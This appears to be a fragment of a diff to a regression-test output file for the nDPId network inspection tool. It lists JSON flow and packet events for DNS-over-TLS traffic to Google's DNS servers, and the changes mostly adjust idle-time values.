+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":161,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1592552878563,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552878563,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA0PO9AAEAGL4LAqAGfCAgEBLviA1WhETzKd2wcRoAQAVeSlgAAAQEICgAAACw7E6h3"} +00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":162,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592552878549,"flow_last_seen":1592552878564,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1592552878564,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48098,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"b734f75d22aaff9866fbd5d27eef9106","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":164,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552878549,"flow_last_seen":1592552878577,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":664,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1592552878577,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48098,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"b734f75d22aaff9866fbd5d27eef9106","ja3s":"1249fb68f48c0444718e4d3b48b27188","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} 00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":277,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1592552827426,"flow_last_seen":1592552828415,"flow_idle_time":120000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":256,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1592552955542,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":277,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552824409,"flow_last_seen":1592552826208,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1592552955542,"l3_proto":"ip4","src_ip":"8.8.8.8","dst_ip":"192.168.1.159","src_port":853,"dst_port":55856,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"DoH_DoT.Google","breed":"Acceptable","category":"Web"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":277,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552824409,"flow_last_seen":1592552826208,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1592552955542,"l3_proto":"ip4","src_ip":"8.8.8.8","dst_ip":"192.168.1.159","src_port":853,"dst_port":55856,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00826{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":277,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1592552825913,"flow_last_seen":1592552826054,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3843,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1592552955542,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00826{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":277,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1592552825913,"flow_last_seen":1592552826030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3843,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1592552955542,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":292,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1592552871852,"flow_last_seen":1592552871941,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1592552996502,"l3_proto":"ip4","src_ip":"8.8.4.4","dst_ip":"192.168.1.159","src_port":853,"dst_port":47968,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"DoH_DoT.Google","breed":"Acceptable","category":"Web"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":292,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1592552871852,"flow_last_seen":1592552871941,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1592552996502,"l3_proto":"ip4","src_ip":"8.8.4.4","dst_ip":"192.168.1.159","src_port":853,"dst_port":47968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00828{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":292,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":104,"flow_first_seen":1592552826036,"flow_last_seen":1592552867048,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":21215,"flow_avg_l4_payload_len":203,"midstream":0,"thread_ts_msec":1592552996502,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":292,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592553007037,"flow_last_seen":1592553007037,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1592553007037,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":292,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1592553007037,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592553007037,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA8FgpAAEAGVl\/AqAGfCAgEBLxSA1VGZWurAAAAAKAC\/\/+KUgAAAgQFtAQCCAoAAH2hAAAAAAEDAwg="} -00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":293,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1592553007051,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592553007051,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA8ScwAAHYGLJ0ICAQEwKgBnwNVvFKvdpW\/RmVrrKAS6yB4FwAAAgQFZAQCCAp\/c2KvAAB9oQEDAwg="} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":294,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1592553007078,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592553007078,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA0FgtAAEAGVmbAqAGfCAgEBLxSA1VGZWusr3aVwIAQAVeQUgAAAQEICgAAfa1\/c2Kv"} -00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592553007037,"flow_last_seen":1592553007088,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1592553007088,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01018{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":297,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592553007037,"flow_last_seen":1592553007118,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1592553007118,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01419{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":298,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592553007037,"flow_last_seen":1592553007118,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2990,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1592553007118,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"5B:59:09:FC:7D:50:E6:F7:D1:08:8E:57:42:A2:D8:AE:1F:03:FF:EC"}} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":532,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":133,"flow_first_seen":1592552878549,"flow_last_seen":1592552996502,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":19828,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1592553079303,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48098,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00829{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":532,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":241,"flow_first_seen":1592553007037,"flow_last_seen":1592553079303,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":48857,"flow_avg_l4_payload_len":202,"midstream":0,"thread_ts_msec":1592553079303,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":277,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552824409,"flow_last_seen":1592552826208,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1592552955542,"l3_proto":"ip4","src_ip":"8.8.8.8","dst_ip":"192.168.1.159","src_port":853,"dst_port":55856,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"DoH_DoT.Google","breed":"Acceptable","category":"Web"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":277,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552824409,"flow_last_seen":1592552826208,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1592552955542,"l3_proto":"ip4","src_ip":"8.8.8.8","dst_ip":"192.168.1.159","src_port":853,"dst_port":55856,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00826{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":277,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1592552825913,"flow_last_seen":1592552826054,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3843,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1592552955542,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00826{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":277,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1592552825913,"flow_last_seen":1592552826030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3843,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1592552955542,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":292,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1592552871852,"flow_last_seen":1592552871941,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1592552996502,"l3_proto":"ip4","src_ip":"8.8.4.4","dst_ip":"192.168.1.159","src_port":853,"dst_port":47968,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"DoH_DoT.Google","breed":"Acceptable","category":"Web"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":292,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1592552871852,"flow_last_seen":1592552871941,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1592552996502,"l3_proto":"ip4","src_ip":"8.8.4.4","dst_ip":"192.168.1.159","src_port":853,"dst_port":47968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00828{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":292,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":104,"flow_first_seen":1592552826036,"flow_last_seen":1592552867048,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":21215,"flow_avg_l4_payload_len":203,"midstream":0,"thread_ts_msec":1592552996502,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":292,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592553007037,"flow_last_seen":1592553007037,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1592553007037,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":292,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1592553007037,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592553007037,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA8FgpAAEAGVl\/AqAGfCAgEBLxSA1VGZWurAAAAAKAC\/\/+KUgAAAgQFtAQCCAoAAH2hAAAAAAEDAwg="} +00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":293,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1592553007051,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592553007051,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA8ScwAAHYGLJ0ICAQEwKgBnwNVvFKvdpW\/RmVrrKAS6yB4FwAAAgQFZAQCCAp\/c2KvAAB9oQEDAwg="} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":294,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1592553007078,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592553007078,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA0FgtAAEAGVmbAqAGfCAgEBLxSA1VGZWusr3aVwIAQAVeQUgAAAQEICgAAfa1\/c2Kv"} +00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592553007037,"flow_last_seen":1592553007088,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1592553007088,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01018{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":297,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592553007037,"flow_last_seen":1592553007118,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1592553007118,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01419{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":298,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592553007037,"flow_last_seen":1592553007118,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2990,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1592553007118,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"5B:59:09:FC:7D:50:E6:F7:D1:08:8E:57:42:A2:D8:AE:1F:03:FF:EC"}} +00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":532,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":133,"flow_first_seen":1592552878549,"flow_last_seen":1592552996502,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":19828,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1592553079303,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48098,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00829{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":532,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":241,"flow_first_seen":1592553007037,"flow_last_seen":1592553079303,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":48857,"flow_avg_l4_payload_len":202,"midstream":0,"thread_ts_msec":1592553079303,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 